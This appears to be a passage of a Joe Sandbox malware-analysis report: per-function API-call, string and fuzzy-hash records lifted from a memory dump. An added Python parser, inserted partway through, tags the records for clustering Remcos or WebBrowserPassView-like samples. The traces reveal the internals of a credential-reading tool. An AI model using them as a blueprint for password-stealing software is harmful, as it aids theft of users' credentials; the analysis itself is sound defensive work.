• wcscat.MSVCRT ref: 0044478E
  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
  • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
  • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
Similarity
• API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
• String ID: \StringFileInfo\
• API String ID: 102104167-2245444037
APIs
• ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
• ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
• ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
• ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
• ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
Similarity
• API ID: ??3@
• String ID:
• API String ID: 613200358-0
APIs
• GetSystemMetrics.USER32(00000000), ref: 00401990
• GetSystemMetrics.USER32(00000001), ref: 0040199B
• SetWindowPlacement.USER32(00000000,?), ref: 004019CC
Similarity
• API ID: MetricsSystem$PlacementWindow
• String ID: AE
• API String ID: 3548547718-685266089
Similarity
• API ID: _memicmpwcslen
• String ID: @@@@$History
• API String ID: 1872909662-685208920
APIs
• memset.MSVCRT ref: 004100FB
• memset.MSVCRT ref: 00410112
  • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
  • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
• _snwprintf.MSVCRT ref: 00410141
Similarity
• API ID: memset$_snwprintf_wcslwrwcscpy
• String ID: </%s>
• API String ID: 3400436232-259020660
APIs
• memset.MSVCRT ref: 0040E770
• SendMessageW.USER32(?,0000105F,00000000,?), ref: 0040E79F
Similarity
• API ID: MessageSendmemset
• String ID: AE$"
• API String ID: 568519121-1989281832
APIs
• memset.MSVCRT ref: 0040D58D
• SetWindowTextW.USER32(?,?), ref: 0040D5BD
• EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
Similarity
• API ID: ChildEnumTextWindowWindowsmemset
• String ID: caption
• API String ID: 1523050162-4135340389
APIs
  • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
  • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
• CreateFontIndirectW.GDI32(?), ref: 00401156
• SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
• SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                    Similarity
                                                                                                    • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                    • String ID: MS Sans Serif
                                                                                                    • API String ID: 210187428-168460110
                                                                                                    • Opcode ID: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                                                                                    • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                    • Opcode Fuzzy Hash: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                                                                                    • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: ClassName_wcsicmpmemset
• String ID: edit
• API String ID: 2747424523-2167791130
• Opcode ID: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
• Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
• Opcode Fuzzy Hash: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
• Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
APIs
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
• GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
• FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
• String ID: SHAutoComplete$shlwapi.dll
• API String ID: 3150196962-1506664499
• Opcode ID: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
• Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
• Opcode Fuzzy Hash: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
• Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
APIs
• memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
• memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
• memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
• memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
• memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
Memory Dump Source
• Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: memcpy$memcmp
• String ID:
• API String ID: 3384217055-0
• Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
• Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
• Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
• Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
APIs
Memory Dump Source
• Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: memset$memcpy
• String ID:
• API String ID: 368790112-0
• Opcode ID: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
• Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
• Opcode Fuzzy Hash: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
• Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
APIs
  • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
  • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
  • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
  • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
  • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
• GetMenu.USER32(?), ref: 00410F8D
• GetSubMenu.USER32(00000000), ref: 00410F9A
• GetSubMenu.USER32(00000000), ref: 00410F9D
• CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
Memory Dump Source
• Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: Menu$ItemMessageSend$CheckEnableRadio
• String ID:
• API String ID: 1889144086-0
• Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
• Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
• Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
• Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
APIs
• CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
• MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
• GetLastError.KERNEL32 ref: 0041810A
• CloseHandle.KERNEL32(00000000), ref: 00418120
Memory Dump Source
• Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: File$CloseCreateErrorHandleLastMappingView
• String ID:
• API String ID: 1661045500-0
• Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
• Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
• Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
• Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
APIs
  • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
• memcpy.MSVCRT(?,?,?), ref: 0042EC7A
Strings
• Cannot add a column to a view, xrefs: 0042EBE8
• sqlite_altertab_%s, xrefs: 0042EC4C
• virtual tables may not be altered, xrefs: 0042EBD2
Memory Dump Source
• Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: memcpymemset
• String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
• API String ID: 1297977491-2063813899
• Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
• Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
• Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
• Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
APIs
• memset.MSVCRT ref: 0040560C
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
  • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
• String ID: *.*$dat$wand.dat
• API String ID: 2618321458-1828844352
• Opcode ID: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
• Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
• Opcode Fuzzy Hash: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
• Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
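The records above are the raw per-function output of the Joe Sandbox IDA plugin: the API calls a function makes (calls made from its sub-functions are marked "Part of subcall function"), the strings it references, the memory dump it was lifted from, and the similarity identifiers (API ID, String ID, Opcode and Instruction fuzzy hashes) that let one function be matched against the same function in other samples. The following is an added example, not Joe Sandbox tooling and not part of this report, that parses that layout into structured records and derives two cheap hunting features from them: the ordered call sequence of each function and a handful of behavioural tags (the tag names and the rules behind them are mine). SAMPLE is two records excerpted from this section and trimmed to one Associated line and four Similarity lines each; the raw report text carries a "Download File" link label glued to each Associated line, which the parser strips.

```python
"""Parse Joe Sandbox per-function records (APIs / Strings / Memory Dump Source /
Similarity blocks) into dicts and derive simple detection features.
Added example; layout taken from the report records above, not from Joe Sandbox code."""
import re

# Two records excerpted from this report section, trimmed; the "Download File"
# suffix on the Associated lines is web-page link residue present in the raw text.
SAMPLE = r"""
APIs
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
• GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
• FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
Similarity
• API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
• String ID: SHAutoComplete$shlwapi.dll
• API String ID: 3150196962-1506664499
• Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
APIs
• CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
• MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
• GetLastError.KERNEL32 ref: 0041810A
• CloseHandle.KERNEL32(00000000), ref: 00418120
Memory Dump Source
• Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
Similarity
• API ID: File$CloseCreateErrorHandleLastMappingView
• String ID:
• API String ID: 1661045500-0
• Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
"""

BULLET = "•"
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# "Func.MODULE(args), ref: ADDR" or "Func.MODULE ref: ADDR", optionally prefixed by the
# subcall marker. Args are matched greedily so nested parentheses like "%s (%s)" survive.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<func>[^.(\s]+)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)
STR_RE = re.compile(r"^(?P<text>.*), xrefs:\s*(?P<xref>[0-9A-F]+)\s*$")


def parse_records(text):
    """Split report text into one dict per function record (a record opens at 'APIs')."""
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            if line == "APIs":
                rec = {"apis": [], "strings": [], "source": {}, "similarity": {}}
                records.append(rec)
            section = line
            continue
        if rec is None or not line.startswith(BULLET):
            continue
        item = line[len(BULLET):].strip()
        if section == "APIs":
            m = API_RE.match(item)
            if m:
                rec["apis"].append({
                    "func": m["func"], "module": m["mod"], "ref": m["ref"],
                    "args": m["args"].split(",") if m["args"] is not None else [],
                    "subcall": m["sub"],  # None when the call is made directly by this function
                })
        elif section == "Strings":
            m = STR_RE.match(item)
            if m:
                rec["strings"].append((m["text"], m["xref"]))
        elif section == "Memory Dump Source":
            key, _, value = item.partition(":")
            value = value.strip().removesuffix("Download File").strip()  # drop link residue
            rec["source"].setdefault(key.strip(), []).append(value)
        elif section == "Similarity":
            key, _, value = item.partition(":")
            rec["similarity"][key.strip()] = value.strip()
    return records


def call_sequence(rec, include_subcalls=False):
    """Ordered MODULE!Func list in report order; direct calls only unless asked otherwise."""
    return [f'{a["module"]}!{a["func"]}' for a in rec["apis"]
            if include_subcalls or a["subcall"] is None]


def tag_record(rec):
    """Behavioural tags for one function record (tag names and rules are this example's own)."""
    funcs = {a["func"] for a in rec["apis"]}
    strings = rec["similarity"].get("String ID", "").split("$")
    tags = []
    if {"LoadLibraryW", "GetProcAddress"} <= funcs:
        tags.append("dynamic-api-resolution")
    if {"GetSystemDirectoryW", "LoadLibraryW"} <= funcs:
        tags.append("full-path-dll-load")   # builds %SystemRoot%\system32\<dll> before loading
    if {"CreateFileMappingW", "MapViewOfFile"} <= funcs:
        tags.append("file-mapping")
    if any(s.lower().endswith(".dll") for s in strings):
        tags.append("dll-name-string")
    return tags


if __name__ == "__main__":
    for r in parse_records(SAMPLE):
        print(r["similarity"]["API ID"], call_sequence(r), tag_record(r))
```

The Instruction Fuzzy Hash and API String ID values are the fields worth keying on when pivoting: the same function body in another Remcos or WebBrowserPassView build keeps the same API String ID even when addresses and the surrounding code shift, so a table of these per record is a cheap way to cluster dumps without writing a YARA rule for every function.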
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                                                                                      • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                                                                    • wcslen.MSVCRT ref: 00410C74
                                                                                                    • _wtoi.MSVCRT(?,?,00000000,00000000,00000000,?,00000000), ref: 00410C80
                                                                                                    • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                                    • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 1549203181-0
                                                                                                    • Opcode ID: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                                                                                    • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                                                    • Opcode Fuzzy Hash: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                                                                                    • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00412057
                                                                                                      • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,Function_0004E518,Function_0004E518,00000005), ref: 0040A12C
                                                                                                    • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                    • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                    • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 3550944819-0
                                                                                                    • Opcode ID: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                                                                    • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                    • Opcode Fuzzy Hash: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                                                                    • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                    APIs
                                                                                                    • free.MSVCRT ref: 0040F561
                                                                                                    • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                                    • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$free
                                                                                                    • String ID: g4@
                                                                                                    • API String ID: 2888793982-2133833424
                                                                                                    • Opcode ID: a6efa1a5bb6df3a3b34dcbd06103d1285660d4d366aaabdaadc0d2e1589271b6
                                                                                                    • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                    • Opcode Fuzzy Hash: a6efa1a5bb6df3a3b34dcbd06103d1285660d4d366aaabdaadc0d2e1589271b6
                                                                                                    • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                                    APIs
                                                                                                    • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                                                    • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                                                    • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy
                                                                                                    • String ID: @
                                                                                                    • API String ID: 3510742995-2766056989
                                                                                                    • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                    • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                                    • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                    • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                                    APIs
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
                                                                                                    • memset.MSVCRT ref: 0040AF18
                                                                                                    • memcpy.MSVCRT(0045A474,?,00000000,00000000,00000000,00000000,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@??3@memcpymemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 1865533344-0
